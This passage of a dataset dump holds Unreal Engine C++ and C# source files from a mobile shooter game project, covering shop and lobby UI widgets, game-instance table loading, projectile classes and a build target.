m_nWeaponIndex);\n\t\t\t//SetEnable(false);\n\t\t\treturn;\n\t\t}\n\n\t\tShowMessageBox(pWeaponShopData->WeaponData.Name, m_pGameMode->GetLastBuyErrorMsg(), nValue);\n\t}\n\n\tOnItemBuyWeapon.Broadcast();\n\n\tUpdateLayout();\n}\n\nvoid UPG_UserWidgetShopWeaponSlot::OnBuyCancel(int32 nValue)\n{\n\tABCHECK(nullptr != m_pUserWidgetBuyPopup);\n\tm_pUserWidgetBuyPopup->SetVisibility(ESlateVisibility::Hidden);\n\n\tUpdateLayout();\n}\n\nvoid UPG_UserWidgetShopWeaponSlot::OnMessagePopupBoxClose()\n{\n\tABCHECK(nullptr != m_pUserWidgetMessagePopup);\n\tm_pUserWidgetMessagePopup->SetVisibility(ESlateVisibility::Hidden);\n\n\tUpdateLayout();\n}" }, { "alpha_fraction": 0.7700865268707275, "alphanum_fraction": 0.7700865268707275, "avg_line_length": 18.731706619262695, "blob_id": "4759acef9a9a1d6a62743ecdb036f626f6920c37", "content_id": "e6f8f0983c4b7d9e3134cb9cc60a7870adaced9c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 821, "license_type": "no_license", "max_line_length": 79, "num_lines": 41, "path": "/Source/Project_Gun/Public/UI/PG_UserWidgetScreenPlayStage.h", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#pragma once\n\n#include \"Project_Gun/Project_Gun.h\"\n\n#include <Blueprint/UserWidget.h>\n#include \"PG_UserWidgetScreenPlayStage.generated.h\"\n\n/**\n * \n */\nUCLASS()\nclass PROJECT_GUN_API UPG_UserWidgetScreenPlayStage : public UUserWidget\n{\n\tGENERATED_BODY()\n\nprotected:\n\tvirtual void NativeConstruct() override;\n\npublic :\n\tvoid Init();\n\npublic :\n\t// 포인트 획득\n\tUFUNCTION(BlueprintImplementableEvent)\n\tvoid OnChangeRewardPoint();\n\n\tvoid OnFire();\n\tvoid OnChangeWeapon();\n\nprivate :\n\tvoid InitPlayStageWeaponBag();\n\tvoid InitPlayMissionState();\n\n\tvoid UpdateWeaponSlotLightBox();\n\nprivate :\n\tPG_WIDGET_DECLAR(UPG_UserWidgetPlayMissionState, WB_MissionState);\n\tPG_WIDGET_DECLAR(UPG_UserWidgetPlayStageWeaponBag, WB_PlayStageWeaponBag);\n};\n" }, { "alpha_fraction": 0.7860962748527527, "alphanum_fraction": 0.7946524024009705, "avg_line_length": 23.181034088134766, "blob_id": "607664f4c81586a6016065cd09d7b761ccecac74", "content_id": "ca53a61193beb63bd1a0510015cd3e61c33b3c51", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2845, "license_type": "no_license", "max_line_length": 99, "num_lines": 116, "path": "/Source/Project_Gun/Public/UI/PG_UserWidgetShopWeaponBox.h", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#pragma once\n\n#include \"Project_Gun/Project_Gun.h\"\n#include \"Game/GameMode/PG_GameModeBase.h\"\n\n#include <Blueprint/UserWidget.h>\n#include \"PG_UserWidgetShopWeaponBox.generated.h\"\n\n\nDECLARE_MULTICAST_DELEGATE(FOnItemBuyWeapon);\n\n/**\n * \n */\nUCLASS()\nclass PROJECT_GUN_API UPG_UserWidgetShopWeaponBox : public UUserWidget\n{\n\tGENERATED_BODY()\n\nprotected:\n\tvirtual void NativeConstruct() override;\n\npublic :\n\tUFUNCTION(BlueprintCallable)\n\tvoid SetWeaponIndex(class APG_GameModeBase* pGameMode, int32 nWeaponIndex);\n\tUFUNCTION(BlueprintCallable)\n\tvoid SetSlotIndex(int32 nSlotIndex);\n\tUFUNCTION(BlueprintCallable)\n\tvoid SetPowerLevel(int32 nPowerLevel);\n\tUFUNCTION(BlueprintCallable)\n\tvoid SetAmmoLevel(int32 nAmmoLevel);\n\tUFUNCTION(BlueprintCallable)\n\tvoid SetEnable(bool bEnable);\n\n\tUFUNCTION(BlueprintCallable)\n\tvoid UpdateWeaponShopLayout();\n\nprivate :\n\tUFUNCTION()\n\tvoid ShowBuyPopupBox(enum EBuyType ekBuyType, FString kTitle, FString kDescription, int32 nPrice);\n\tUFUNCTION()\n\tvoid ShowMessageBox(FString kTitle, FString kDescription, int32 nValue);\n\n\npublic :\n\tUFUNCTION()\n\tvoid OnBuyOK(int32 nValue);\n\tUFUNCTION()\n\tvoid OnBuyCancel(int32 nValue);\n\tUFUNCTION()\n\tvoid OnMessagePopupBoxClose();\n\nprotected :\n\t// 무기 언락 요청\n\tUFUNCTION()\n\tvoid OnRequestUnlockWeapon();\n\t// 파워 레벨업 요청\n\tUFUNCTION()\n\tvoid OnRequestLevelupPower();\n\t// 탄약 확장 요청\n\tUFUNCTION()\n\tvoid OnRequestLevelupAmmo();\n\npublic :\n\tFOnItemBuyWeapon OnItemBuyWeapon;\n\t\nprotected :\n\tUPROPERTY(BlueprintReadWrite)\n\tint32 WeaponIndex = PG_INVALID_INDEX;\n\tUPROPERTY(BlueprintReadWrite)\n\tint32 SlotIndex = PG_INVALID_INDEX;\n\tUPROPERTY(BlueprintReadWrite)\n\tint32 PowerLevel = PG_INVALID_INDEX;\n\tUPROPERTY(BlueprintReadWrite)\n\tint32 AmmoLevel = PG_INVALID_INDEX;\n\tUPROPERTY(BlueprintReadWrite)\n\tbool IsMaxPower = false;\n\tUPROPERTY(BlueprintReadWrite)\n\tbool IsMaxAmmo = false;\n\tUPROPERTY(BlueprintReadWrite)\n\tbool IsAbleBuyWepaon = false;\n\tUPROPERTY(BlueprintReadWrite)\n\tbool IsAbleBuyPower = false;\n\tUPROPERTY(BlueprintReadWrite)\n\tbool IsAbleBuyAmmo = false;\n\n\tUPROPERTY(BlueprintReadWrite)\n\tclass UButton* Btn_Weapon;\n\tUPROPERTY(BlueprintReadWrite)\n\tclass UButton* Btn_Power;\n\tUPROPERTY(BlueprintReadWrite)\n\tclass UButton* Btn_Ammo;\n\tUPROPERTY(BlueprintReadWrite)\n\tclass UTextBlock* Text_PowerLevel;\n\tUPROPERTY(BlueprintReadWrite)\n\tclass UTextBlock* Text_AmmoLevel;\n\n\tUPROPERTY(BlueprintReadWrite)\n\tclass UImage* Img_WeaponLock;\n\tUPROPERTY(BlueprintReadWrite)\n\tclass UImage* Img_PowerUp;\n\tUPROPERTY(BlueprintReadWrite)\n\tclass UImage* Img_AmmoUp;\n\nprivate :\n\tUPROPERTY()\n\tTWeakObjectPtr<class APG_GameModeBase>\tm_pGameMode;\n\n\tUPROPERTY()\n\tclass UPG_UserWidgetBuyPopup*\t\tm_pUserWidgetBuyPopup;\n\tUPROPERTY()\n\tclass UPG_UserWidgetMessagePopup*\tm_pUserWidgetMessagePopup;\n\t\n};\n" }, { "alpha_fraction": 0.7810218930244446, "alphanum_fraction": 0.7810218930244446, "avg_line_length": 33.25, "blob_id": "569529c9bfe1209d7570d0ac22caa9c2f72fcc36", "content_id": "2fa9dc7cb65069c0c3b894164147f84c420089a2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 276, "license_type": "no_license", "max_line_length": 84, "num_lines": 8, "path": "/Source/Project_Gun/Project_Gun.cpp", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#include \"Project_Gun/Project_Gun.h\"\n\n#include <Modules/ModuleManager.h>\n\nDEFINE_LOG_CATEGORY(Project_Gun);\nIMPLEMENT_PRIMARY_GAME_MODULE( FDefaultGameModuleImpl, Project_Gun, \"Project_Gun\" );\n" }, { "alpha_fraction": 0.6721750497817993, "alphanum_fraction": 0.6739615797996521, "avg_line_length": 26.64197540283203, "blob_id": "ff75e86ab7a097c808046375311ba4c4cf455f22", "content_id": "a603d4d6cd77a08766f20aea2026efee36b84d96", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2395, "license_type": "no_license", "max_line_length": 95, "num_lines": 81, "path": "/Source/Project_Gun/Public/UI/PG_UserWidgetScreenShop.h", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#pragma once\n\n#include \"Project_Gun/Project_Gun.h\"\n#include \"Blueprint/UserWidget.h\"\n\n#include \"PG_UserWidgetScreenShop.generated.h\"\n\n/**\n * \n */\nUCLASS()\nclass PROJECT_GUN_API UPG_UserWidgetScreenShop : public UUserWidget\n{\n\tGENERATED_BODY()\n\n\tenum\n\t{\n\t\t// 사용하지 않도록 개선 예정\n\t\teMaxLethalShopItemSlot = 3,\t\t// 필살기 \n\t\teMaxWeaponShopItemSlot = 3,\t\t// 무기\n\t};\n\nprotected:\n\tvirtual void NativeConstruct() override;\n\tvirtual void NativeTick(const FGeometry& MyGeometry, float DeltaTime) override;\n\npublic :\n\tvoid Init();\n\n\tUFUNCTION(BlueprintCallable)\n\tvoid UpdateLethalShopLayout();\n\tUFUNCTION(BlueprintCallable)\n\tvoid UpdateWeaponShopLayout();\n\tUFUNCTION(BlueprintImplementableEvent, Category = \"RewardPoint\")\n\tvoid UpdateRewardPoint();\n\n\tvoid SetBtnEnableAD(bool bEnable);\n\tvoid SetADRemainTime(int32 nTime);\n\n\tvoid ShowMessageBox(FString kTitle, FString kDescription);\n\nprotected:\n\tUFUNCTION(BlueprintCallable)\n\tvoid OnBtnGotoLobby();\n\tUFUNCTION(BlueprintCallable)\n\tvoid OnBtnADView();\n\n\t//============================================================================================\n\t// 광고 시청에 대한 결과\n\t//============================================================================================\n\tUFUNCTION(BlueprintCallable)\n\tvoid OnADRewardVideoSucessed();\t\t// 유저가 보상형 광고를 성공적으로 보았음\n\tUFUNCTION(BlueprintCallable)\n\tvoid OnADRewardVideoError();\t\t// 유저가 보상형 광고 보는중 닫거나 실패하였음\n\t//============================================================================================\n\n\t// 메시지 팝업박스\n\tUFUNCTION()\n\tvoid OnMessagePopupBoxClose();\n\nprotected:\n\tPG_WIDGET_DECLAR(UButton, BtnGotoLobby);\n\tPG_WIDGET_DECLAR(UButton, BtnADView);\n\tPG_WIDGET_DECLAR(UTextBlock, TextADRemainTime);\n\t\n\tPG_WIDGET_DECLAR_TArray(UPG_UserWidgetSkillSlot, WB_SkillSlot);\n\tPG_WIDGET_DECLAR_TArray(UPG_UserWidgetShopWeaponSlot, WB_ShopWeaponSlot);\n\npublic:\n\t// 메인로비\n\tUPROPERTY(EditAnywhere, BlueprintReadOnly, Category = \"PG Setting WidgetClass\")\n\tTSubclassOf <class UPG_UserWidgetMainLobby_Renewal> WB_MainLobbyClass;\n\tUPROPERTY()\n\tclass UPG_UserWidgetMainLobby_Renewal* m_pWBMainLobby = nullptr;\n\n\t// 메시지 팝업\n\tUPROPERTY()\n\tclass UPG_UserWidgetMessagePopup* m_pUserWidgetMessagePopup = nullptr;\n};\n" }, { "alpha_fraction": 0.7753779888153076, "alphanum_fraction": 0.7775378227233887, "avg_line_length": 26.235294342041016, "blob_id": "d48ebf04523d195d6172967ccaf8295258e82fca", "content_id": "f7cc6a9e4a2b20896ef4e5c5228abf96af87e063", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C#", "length_bytes": 463, "license_type": "no_license", "max_line_length": 78, "num_lines": 17, "path": "/Source/Project_GunEditor.Target.cs", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\nusing UnrealBuildTool;\nusing System.Collections.Generic;\n\npublic class Project_GunEditorTarget : TargetRules\n{\n\tpublic Project_GunEditorTarget(TargetInfo Target) : base(Target)\n\t{\n\t\tType = TargetType.Editor;\n\n\t\tDefaultBuildSettings = BuildSettingsVersion.V2;\n\t\t//ShadowVariableWarningLevel = WarningLevel.Warning;\n\n\t\tExtraModuleNames.AddRange( new string[] { \"Project_Gun\" } );\n\t}\n}\n" }, { "alpha_fraction": 0.7799059152603149, "alphanum_fraction": 0.7829301357269287, "avg_line_length": 27.33333396911621, "blob_id": "725cd10f2f69870d68c15cccc61bc42a2562e1b3", "content_id": "2257e428b6e109c09bb12d1e7eb3d6373b31069a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 3040, "license_type": "no_license", "max_line_length": 206, "num_lines": 105, "path": "/Source/Project_Gun/Private/BlueScriptObject/Projectile/PG_ProjectileShutgun.cpp", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#include \"BlueScriptObject/Projectile/PG_ProjectileShutgun.h\"\n#include \"BlueScriptObject/Weapon/PG_Weapon.h\"\n#include \"Character/PG_MonChar.h\"\n#include \"Character/PG_MyChar.h\"\n\nAPG_ProjectileShutgun::APG_ProjectileShutgun()\n{\n\tPrimaryActorTick.bCanEverTick = true;\n\n\tCollisionMeshComponent = CreateDefaultSubobject<UStaticMeshComponent>(TEXT(\"COLLISIONMESHCOMPONENT\"));\n\tCollisionMeshComponent->SetupAttachment(CollisionComponent);\n\tCollisionMeshComponent->OnComponentBeginOverlap.AddDynamic(this, &APG_ProjectileShutgun::OnTargetBeginOverlap);\n}\n\nvoid APG_ProjectileShutgun::PostInitializeComponents()\n{\n\tSuper::PostInitializeComponents();\n\n\tABCHECK(nullptr != CollisionMeshComponent);\n\tCollisionMeshComponent->SetCollisionProfileName(TEXT(\"Projectile\"));\n\tCollisionMeshComponent->SetGenerateOverlapEvents(true);\n}\n\nvoid APG_ProjectileShutgun::BeginPlay()\n{\n\tSuper::BeginPlay();\n\n\tABCHECK(nullptr != CollisionMeshComponent);\n\tCollisionMeshComponent->SetVisibility(true);\n}\n\nvoid APG_ProjectileShutgun::Tick(float DeltaTime)\n{\n\tSuper::Tick(DeltaTime);\n\n\tUpdateCollisionScale(DeltaTime);\n}\n\nvoid APG_ProjectileShutgun::UpdateCollisionScale(float DeltaTime)\n{\n\tif (CollisionMeshComponent)\n\t{\n\t\tm_fScaleTime += DeltaTime;\n\n\t\t// 샷건 범위가 완전히 펴질때까지의 목표시간\n\t\tfloat GoalSec = 0.2f;\n\t\tif (m_fScaleTime > GoalSec)\n\t\t\tm_fScaleTime = GoalSec;\n\n\t\tfloat fScale = (m_fScaleTime / GoalSec);\n\t\tFVector vScale(fScale, fScale, fScale);// = CollisionMeshComponent->GetComponentScale();\n\t\tCollisionMeshComponent->SetRelativeScale3D(vScale);\n\n\t\tif (1.0f <= fScale)\n\t\t{\n\t\t\tDestroy();\n\t\t}\n\t}\n}\n\nvoid APG_ProjectileShutgun::FireInDirection(const struct FPGWeaponData* pWeaponData, const FVector& ShootDirection, bool bMonsterWeapon)\n{\n\tABCHECK(nullptr != CollisionMeshComponent);\n\tWeaponData = *pWeaponData;\n\n\tFName CollisionName = bMonsterWeapon ? TEXT(\"Mon_Projectile\") : TEXT(\"Projectile\");\n\tif (CollisionMeshComponent)\n\t{\n\t\tCollisionMeshComponent->SetCollisionProfileName(CollisionName);\n\t}\n\n\tvStartPos = GetActorLocation();\n}\n\nvoid APG_ProjectileShutgun::SetScaleTime(float fScaleTime)\n{\n\tm_fScaleTime = fScaleTime;\n\tUpdateCollisionScale(0.0f);\n}\n\nvoid APG_ProjectileShutgun::OnTargetBeginOverlap(UPrimitiveComponent* OverlappedComp, AActor* OtherActor, UPrimitiveComponent* OtherComp, int32 OtherBodyIndex, bool bFromWeep, const FHitResult& SweepResult)\n{\n\tauto OwnerWeapon = Cast<APG_Weapon>(GetOwner());\n\tABCHECK(nullptr != OwnerWeapon);\n\n\t// 몬스터 충돌시\n\tauto AMonCharacter = Cast<APG_MonChar>(OtherActor);\n\tif (AMonCharacter && IsOwnerMyPlayer())\n\t\tAMonCharacter->OnDamage(OwnerWeapon->GetWeaponAttackDamage());\n\n\t// 플레이어 충돌시\n\tauto AMyCharacter = Cast<APG_MyChar>(OtherActor);\n\tif (AMyCharacter&& IsOwnerMonster())\n\t\tAMyCharacter->OnAttackedByMonster();\n}\n\nvoid APG_ProjectileShutgun::OnPlayEndParticle(UParticleSystemComponent* ParticleSystemComponent)\n{\n\tif (false == WeaponData.Collide)\n\t\treturn;\n\n\tDestroy();\n}\n\n" }, { "alpha_fraction": 0.7736085057258606, "alphanum_fraction": 0.7786116600036621, "avg_line_length": 19.766233444213867, "blob_id": "d7b00ed8a822579afc7b1bd9f142c8bdcec581d1", "content_id": "7e59124647066d37c48c4e032060d72592876605", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1659, "license_type": "no_license", "max_line_length": 79, "num_lines": 77, "path": "/Source/Project_Gun/Public/UI/PG_UserWidgetMainLobby.h", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#pragma once\n\n#include \"Project_Gun/Project_Gun.h\"\n\n#include <Blueprint/UserWidget.h>\n#include \"PG_UserWidgetMainLobby.generated.h\"\n\n/**\n * \n */\nUCLASS()\nclass PROJECT_GUN_API UPG_UserWidgetMainLobby : public UUserWidget\n{\n\tGENERATED_BODY()\n\t\n\nprotected :\n\tvirtual void NativeConstruct() override;\n\npublic :\n\tUFUNCTION(BlueprintCallable)\n\tFString GetSelectedStageName();\n\n\t// 스테이지 별 획득 UI 갱신\n\tUFUNCTION(BlueprintCallable)\n\tvoid UpdateClearStageLayout();\n\n\t// 무기 슬롯 갱신\n\tUFUNCTION(BlueprintCallable)\n\tvoid UpdateWeaponSlotLayout();\n\n\t// 인벤토리 슬롯 선택 아이콘 이미지\n\tUFUNCTION(BlueprintCallable)\n\tvoid AllHideIconOpenSlot();\n\tUFUNCTION(BlueprintCallable)\n\tvoid SetEnableIconOpenSlot(int32 nSlotIndex, bool bEnable);\n\npublic :\n\tUFUNCTION(BlueprintCallable)\n\tbool OnNextSelectStage();\n\tUFUNCTION(BlueprintCallable)\n\tbool OnPrevSelectStage();\n\n\tUFUNCTION()\n\tvoid OnBtnClickedWeaponSlot(int32 nSlotIndex);\n\tUFUNCTION()\n\tvoid OnCloseWeaponInventory(int32 nSlotIndex, int32 nWeaponIndex);\n\nprivate :\n\tUPROPERTY()\n\tclass UOverlay* Overlay_ActiveFlag;\n\tUPROPERTY()\n\tclass UOverlay* Overlay_DeActiveFlag;\n\tUPROPERTY()\n\tclass UTextBlock* Text_FlagValue;\n\t\n\n\tUPROPERTY()\n\tclass UOverlay* Overlay_ActiveTime;\n\tUPROPERTY()\n\tclass UOverlay* Overlay_DeActiveTime;\n\tUPROPERTY()\n\tclass UTextBlock* Text_TimeValue;\n\n\tUPROPERTY()\n\tclass UOverlay* Overlay_ActiveLethal;\n\tUPROPERTY()\n\tclass UOverlay* Overlay_DeActiveLethal;\n\tUPROPERTY()\n\tclass UTextBlock* Text_LethalValue;\n\n\n\tUPROPERTY()\n\tclass UPG_UserWidgetWeaponInventory* WB_WeaponInventory;\n};\n" }, { "alpha_fraction": 0.7253345847129822, "alphanum_fraction": 0.7309368252754211, "avg_line_length": 26.57939910888672, "blob_id": "47ce7aef251c6d9532c9c81058b0576e8db1a38a", "content_id": "8b3d2dbe5cfc63bbcf15a4e1e5988a410a6f4e6d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 6428, "license_type": "no_license", "max_line_length": 139, "num_lines": 233, "path": "/Source/Project_Gun/Private/Game/GameInstance/PG_GameInstance.cpp", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#include \"Game/GameInstance/PG_GameInstance.h\"\n#include \"Game/GameMode/PG_GameModeBase.h\"\n#include \"Game/GameMode/PG_GameModeMainLobby.h\"\n\nUPG_GameInstance::UPG_GameInstance()\n{\n\tLoadTable();\n}\n\nvoid UPG_GameInstance::Init()\n{\n\tSuper::Init();\n\n\t//PalyStageID = 0;\n\n\tm_kADData.Init(this);\n\tLoadConsoleCommand();\n}\n\nvoid UPG_GameInstance::Shutdown()\n{\n\tm_kConsole.ReleaseCommands();\n\tSuper::Shutdown();\n}\n\nFPGCharacterMovementData* UPG_GameInstance::GetTableCharacterMovementData()\n{\n\treturn m_pCharacterMovementTable ? m_pCharacterMovementTable->FindRow<FPGCharacterMovementData>(*FString::FromInt(0), TEXT(\"\")) : nullptr;\n}\n\nFPGCharacterCameraData* UPG_GameInstance::GetTableCharacterCameraData()\n{\n\treturn m_pCharacterCameraTable ? m_pCharacterCameraTable->FindRow<FPGCharacterCameraData>(*FString::FromInt(0), TEXT(\"\")) : nullptr;\n}\n\nconst FPGWeaponTableData* UPG_GameInstance::GetWeaponTableData(int32 nIndex)\n{\n\treturn m_pWeaponTable ? m_pWeaponTable->FindRow<FPGWeaponTableData>(*FString::FromInt(nIndex), TEXT(\"\")) : nullptr;\n}\n\nconst bool UPG_GameInstance::GetAllWeaponTableData(TArray<const FPGWeaponTableData*>& a_rkWeaponTableDatas)\n{\n\tABCHECK(nullptr != m_pWeaponTable, false);\n\n\tm_pWeaponTable->GetAllRows(TEXT(\"WeaponShopTable\"), a_rkWeaponTableDatas);\n\n\treturn (0 < a_rkWeaponTableDatas.Num());\n}\n\nconst FPGStageData*\tUPG_GameInstance::GetTableStageData(int32 nID)\n{\n\treturn m_pStageTable ? m_pStageTable->FindRow<FPGStageData>(*FString::FromInt(nID), TEXT(\"\")) : nullptr;\n}\n\nconst bool UPG_GameInstance::GetAllTableStageData(OUT TArray<const FPGStageData*>& a_rkStageDatas)\n{\n\tABCHECK(nullptr != m_pStageTable, false);\n\n\tm_pStageTable->GetAllRows(TEXT(\"StageTable\"), a_rkStageDatas);\n\n\treturn (0 < a_rkStageDatas.Num());\n}\n\nconst FPGLethalAttackData*\tUPG_GameInstance::GetTableLethalAttackData(int32 nID)\n{\n\treturn m_pLethalAttackTable ? m_pLethalAttackTable->FindRow<FPGLethalAttackData>(*FString::FromInt(nID), TEXT(\"\")) : nullptr;\n}\n\nconst FPGADTableData* UPG_GameInstance::GetADTableData(EADType eADType)\n{\n\treturn m_pADTable ? m_pADTable->FindRow<FPGADTableData>(*FString::FromInt((int32)eADType), TEXT(\"\")) : nullptr;\n}\n\nint32 UPG_GameInstance::GetADRemainTime(EADType eADType)\n{\n\treturn m_kADData.GetRemainReViewableTime(eADType);\n}\n\nbool UPG_GameInstance::IsAbleADView(EADType eADType)\n{\n\treturn m_kADData.IsAbleViewAD(eADType);\n}\n\nvoid UPG_GameInstance::ResetADRemainTime(EADType eADType)\n{\n\tm_kADData.Reset(eADType);\n}\n\nbool UPG_GameInstance::LoadTable()\n{\n#define LOAD_TABLE(Path, Out)\t\\\n{\t\\\n\tFString TablePath = Path;\t\\\n\tstatic ConstructorHelpers::FObjectFinder<UDataTable> DT_Table(*TablePath);\t\\\n\tif (DT_Table.Succeeded())\t\\\n\t{\t\\\n\t\tOut = DT_Table.Object;\t\\\n\t\tABCHECK(Out->GetRowMap().Num() > 0, false);\t\\\n\t}\t\\\n\telse\t\\\n\t{\t\\\n\t\tABLOG(Error, TEXT(\"Can't Find Table : %s\"), *TablePath);\treturn false; \\\n\t}\t\\\n}\t\n\tLOAD_TABLE(TEXT(\"/Game/PG/Tables/Character/CharacterMovementTable.CharacterMovementTable\"), m_pCharacterMovementTable);\n\tLOAD_TABLE(TEXT(\"/Game/PG/Tables/Character/CharacterCameraTable.CharacterCameraTable\"), m_pCharacterCameraTable);\n\tLOAD_TABLE(TEXT(\"/Game/PG/Tables/Weapon/WeaponTable.WeaponTable\"), m_pWeaponTable);\n\tLOAD_TABLE(TEXT(\"/Game/PG/Tables/Stage/StageData.StageData\"), m_pStageTable);\n\tLOAD_TABLE(TEXT(\"/Game/PG/Tables/LethalAttack/LethalAttackTable.LethalAttackTable\"), m_pLethalAttackTable);\n\tLOAD_TABLE(TEXT(\"/Game/PG/Tables/AD/ADTable.ADTable\"), m_pADTable);\n\t\n#undef LOAD_TABLE\n\n\treturn true;\n}\n\nbool UPG_GameInstance::LoadConsoleCommand()\n{\n\tABCHECK(m_kConsole.InitConsoleCommands(), false);\n\treturn true;\n}\n\nFString UPG_GameInstance::GetStageName(int32 StageID)\n{\n\treturn FString::Printf(TEXT(\"/Game/PG/Maps/Stage/Stage%d\"), StageID);\n}\n\n//void UPG_GameInstance::StartGame_NextStage()\n//{\n//\tPalyStageID++;\n//\t//StartGame();\n//\n//\tauto pGameModeBase = Cast<APG_GameModeBase>(GetWorld()->GetAuthGameMode());\n//\tif (pGameModeBase)\n//\t{\n//\t\tpGameModeBase->StartGame();\n//\t}\n//}\n//\n//void UPG_GameInstance::RestartGame()\n//{\n//\tFString RestartStageName = GetStageName(PalyStageID);\n//\t//FString DebugMsg = FString::Printf(TEXT(\"Stage Restart : %s\"), *RestartStageName);\n//\t//GEngine->AddOnScreenDebugMessage(-1, 3.0f, FColor::Yellow, DebugMsg);\n//\n//\tUGameplayStatics::OpenLevel(GetWorld(), *RestartStageName);\n//}\n//\n//bool UPG_GameInstance::OnNextSelectStage()\n//{\n//\tint32 nNextStage = PalyStageID + 1;\n//\n//\tif (GetTableStageData(nNextStage))\n//\t{\n//\t\tint32 nBackupPlayStageID = PalyStageID;\n//\t\tPalyStageID = nNextStage;\n//\n//\t\tauto pGameModeBase = Cast<APG_GameModeBase>(GetWorld()->GetAuthGameMode());\n//\t\tABCHECK(nullptr != pGameModeBase, false);\n//\n//\t\tif (false == pGameModeBase->ChangeSelectStageData(PalyStageID))\n//\t\t{\n//\t\t\tPalyStageID = nBackupPlayStageID;\n//\t\t\treturn false;\n//\t\t}\n//\n//\t\treturn true;\n//\t}\n//\n//\treturn false;\n//}\n//\n//bool UPG_GameInstance::OnPrevSelectStage()\n//{\n//\tint32 nPrevStage = PalyStageID - 1;\n//\n//\tif (GetTableStageData(nPrevStage))\n//\t{\n//\t\tint32 nBackupPlayStageID = PalyStageID;\n//\t\tPalyStageID = nPrevStage;\n//\n//\t\tauto pGameModeBase = Cast<APG_GameModeBase>(GetWorld()->GetAuthGameMode());\n//\t\tABCHECK(nullptr != pGameModeBase, false);\n//\n//\t\tif (false == pGameModeBase->ChangeSelectStageData(PalyStageID))\n//\t\t{\n//\t\t\tPalyStageID = nBackupPlayStageID;\n//\t\t\treturn false;\n//\t\t}\n//\n//\t\treturn true;\n//\t}\n//\n//\treturn false;\n//}\n//\n//bool UPG_GameInstance::SetPlayStageID(int32 nPlayStageID)\n//{\n//\tABCHECK(GetTableStageData(nPlayStageID), false);\n//\n//\tPalyStageID = nPlayStageID;\n//\treturn true;\n//}\n\n//bool UPG_GameInstance::StartGame()\n//{\n//\tABCHECK(GetTableStageData(PalyStageID), false);\n//\n//\tauto pGameModeBase = Cast<APG_GameModeBase>(GetWorld()->GetAuthGameMode());\n//\tABCHECK(nullptr != pGameModeBase, false);\n//\n//\tauto pSavePlayerData = pGameModeBase->GetSavePlayerData();\n//\tABCHECK(nullptr != pSavePlayerData, false);\n//\n//\tpSavePlayerData->m_nLastPlayStageID = PalyStageID;\n//\tpGameModeBase->SavePlayerData();\n//\n//\tFString NextStageName = GetStageName(PalyStageID);\n//\t//FString DebugMsg = FString::Printf(TEXT(\"Play Stage : %s\"), *NextStageName);\n//\t//GEngine->AddOnScreenDebugMessage(-1, 3.0f, FColor::Red, DebugMsg);\n//\n//\tUGameplayStatics::OpenLevel(GetWorld(), *NextStageName);\n//\n//\treturn true;\n//}\n\nvoid UPG_GameInstance::FromGameModeTick(float DeltaTime)\n{\n\tm_kConsole.UpdateCommands();\n\tm_kADData.Update(DeltaTime);\n}\n" }, { "alpha_fraction": 0.8080691695213318, "alphanum_fraction": 0.8092219233512878, "avg_line_length": 39.348838806152344, "blob_id": "86696d321775460e0606fe15cfb51e08b428fb3d", "content_id": "8e563d47ed008fe695899edec03f4f9e3ad11a85", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1791, "license_type": "no_license", "max_line_length": 202, "num_lines": 43, "path": "/Source/Project_Gun/Public/BlueScriptObject/Projectile/PG_ProjectileRifle.h", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#pragma once\n\n#include \"Project_Gun/Project_Gun.h\"\n#include \"BlueScriptObject/Projectile/PG_Projectile.h\"\n\n#include <GameFramework/Actor.h>\n#include \"PG_ProjectileRifle.generated.h\"\n\nUCLASS()\nclass PROJECT_GUN_API APG_ProjectileRifle : public APG_Projectile\n{\n\tGENERATED_BODY()\n\t\npublic:\t\n\tAPG_ProjectileRifle();\n\nprotected:\n\tvirtual void PostInitializeComponents() override;\n\tvirtual void BeginPlay() override;\t// Called when the game starts or when spawned\n\npublic:\t\n\tvirtual void FireInDirection(const struct FPGWeaponData* pWeaponData, const FVector& ShootDirection, bool bMonsterWeapon = false) override;\n\nprotected:\n\tvirtual void OnTargetBeginOverlap(UPrimitiveComponent* OverlappedComp, AActor* OtherActor, UPrimitiveComponent* OtherComp, int32 OtherBodyIndex, bool bFromWeep, const FHitResult& SweepResult) override;\n\tvirtual void OnTargetHit(UPrimitiveComponent* HitComponent, AActor* OtherActor, UPrimitiveComponent* OtherComp, FVector NormalImpulse, const FHitResult& Hit) override;\n\tvirtual void OnPlayEndParticle(UParticleSystemComponent* ParticleSystemComponent) override;\n\t\nprivate :\n\t// 오브젝트 Mesh\n\tUPROPERTY(VisibleAnywhere, BlueprintReadWrite, Category = \"PG ProjectileData\", Meta = (AllowPrivateAccess = true))\n\tUStaticMeshComponent*\tProjectileMeshComponent;\n\n\t// 